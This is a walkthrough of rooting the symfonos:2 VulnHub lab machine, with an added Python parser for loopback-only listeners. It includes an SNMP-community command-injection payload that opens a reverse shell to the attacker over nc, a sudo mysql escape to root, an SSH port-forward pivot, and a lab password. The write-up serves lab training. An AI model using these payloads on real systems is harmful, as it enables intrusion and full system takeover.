Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$ whoami
aeolus
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Privilege Escalation
Check for anything usable for privilege escalation, such as sudo rights or SUID binaries:
aeolus@symfonos2:~$ sudo -l
[sudo] password for aeolus:
Sorry, user aeolus may not run sudo on symfonos2.
aeolus@symfonos2:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
aeolus@symfonos2:~$ find / -perm -4000 -type f 2>/dev/null | grep -v proc
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/bin/mount
/bin/su
/bin/ping
/bin/umount
Nothing exploitable was found here.
LibreNMS Service
PS: I asked an AI about this; it suggested LibreNMS privilege escalation, since /etc/passwd contains a librenms user and ss -tlnp shows a local listener on 8080:
aeolus@symfonos2:~$ ss -tlnp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 50 *:139 *:*
LISTEN 0 128 127.0.0.1:8080 *:*
LISTEN 0 32 *:21 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 20 127.0.0.1:25 *:*
LISTEN 0 50 *:445 *:*
LISTEN 0 50 :::139 :::*
LISTEN 0 64 :::80 :::*
LISTEN 0 128 :::22 :::*
LISTEN 0 20 ::1:25 :::*
LISTEN 0 50 :::445 :::*
Local port 8080 is a web service; combined with the librenms user, it is fairly safe to conclude that LibreNMS runs there, and exploitation can proceed from it.
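The step that mattered here was noticing which listeners are bound to loopback only and therefore invisible to the external nmap scan. As an added example (not from the original post), the following parses ss -tlnp output and separates loopback-only ports from externally exposed ones; the sample input is the listing above, re-flowed one socket per line, and is labelled as constructed.

```python
from typing import Dict, List, Set

# Constructed sample: the ss -tlnp listing from this page, one socket per line.
SAMPLE_SS_OUTPUT = """State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 *:*
LISTEN 0 50 *:139 *:*
LISTEN 0 128 127.0.0.1:8080 *:*
LISTEN 0 32 *:21 *:*
LISTEN 0 128 *:22 *:*
LISTEN 0 20 127.0.0.1:25 *:*
LISTEN 0 50 *:445 *:*
LISTEN 0 50 :::139 :::*
LISTEN 0 64 :::80 :::*
LISTEN 0 128 :::22 :::*
LISTEN 0 20 ::1:25 :::*
LISTEN 0 50 :::445 :::*
"""

LOOPBACK_HOSTS = {"127.0.0.1", "::1"}


def split_addr(local: str):
    """Split 'host:port' on the last colon so IPv6 forms like ':::80' and '::1:25' work."""
    host, _, port = local.rpartition(":")
    return host.strip("[]"), int(port)


def is_loopback(host: str) -> bool:
    return host in LOOPBACK_HOSTS or host.startswith("127.")


def parse_listeners(text: str) -> Dict[int, List[str]]:
    """Map each listening port to the local hosts it is bound on."""
    listeners: Dict[int, List[str]] = {}
    for line in text.splitlines():
        fields = line.split()
        # Column layout: State Recv-Q Send-Q Local Peer [Process]; skip the header.
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        host, port = split_addr(fields[3])
        listeners.setdefault(port, []).append(host)
    return listeners


def loopback_only_ports(text: str) -> Set[int]:
    """Ports that an external scan cannot see, e.g. the 8080 web app found on this box."""
    return {p for p, hosts in parse_listeners(text).items()
            if all(is_loopback(h) for h in hosts)}


def exposed_ports(text: str) -> Set[int]:
    """Ports bound on at least one non-loopback address; should match the nmap result."""
    return {p for p, hosts in parse_listeners(text).items()
            if not all(is_loopback(h) for h in hosts)}
```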
The idea: a web service listens locally → forward it out via SSH port forwarding → access it → find a known vulnerability and escalate.
Open a new SSH connection to serve as the tunnel:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2/service]
└─$ ssh -L 8080:127.0.0.1:8080 aeolus@192.168.56.137
aeolus@192.168.56.137's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 4 16:41:42 2026 from 192.168.56.128
aeolus@symfonos2:~$
Then access it through the browser:
The service is reachable, and the existing credentials (aeolus:sergioteamo) log in successfully:
Start a listener on kali:
nc -lvnp 4444
In the browser's top menu, Devices → Add Device:
- Hostname: test
- SNMP version: v2c
- Community field, enter the payload:
'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 4444 >/tmp/f) #
After saving, the reverse shell comes back:
┌──(kali㉿kali)-[~/Work/vulnhub/symfonos2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.128] from (UNKNOWN) [192.168.56.137] 44724
/bin/sh: 0: can't access tty; job control turned off
$ whoami
cronus
$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
sudo Privilege Escalation
sudo -l shows that mysql can be run as root without a password:
$ sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
$
GTFOBins shows this program can be used to open a root shell:
$ sudo mysql -e '\! /bin/bash'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
Getting the Flag
With root privileges, the flag file is found in root's home directory:
ls /root
proof.txt
cat /root/proof.txt
Congrats on rooting symfonos:2!
, ,
,-`{-`/
,-~ , \ {-~~-,
,~ , ,`,-~~-,`,
,` , { { } } }/
; ,--/`\ \ / / }/ /,/
; ,-./ \ \ { { ( /,; ,/ ,/
; / ` } } `, `-`-.___ / `, ,/ `,/
\| ,`,` `~.___,---} / ,`,,/ ,`,;
` { { __ / ,`/ ,`,;
/ \ \ _,`, `{ `,{ `,`;`
{ } } /~\ .-:::-. (--, ;\ `,} `,`;
\\._./ / /` , \ ,:::::::::, `~; \},/ `,`; ,-=-
`-..-` /. ` .\_ ;:::::::::::; __,{ `/ `,`; {
/ , ~ . ^ `~`\:::::::::::<<~>-,,`, `-, ``,_ }
/~~ . ` . ~ , .`~~\:::::::; _-~ ;__, `,-`
/`\ /~, . ~ , ' ` , .` \::::;` <<<~``` ``-,,__ ;
/` .`\ /` . ^ , ~ , . ` . ~\~ \\, `,__
/ ` , ,`\. ` ~ , ^ , ` ~ . . ``~~~`, `-`--, \
/ , ~ . ~ \ , ` . ^ ` , . ^ . , ` .`-,___,---,__ ``
/` ` . ~ . ` `\ ` ~ , . , ` , . ~ ^ , . ~ , .`~---,___
/` . ` , . ~ , \ ` ~ , . ^ , ~ . ` , ~ . ^ , ~ . `-,
Contact me via Twitter @zayotic to give feedback!
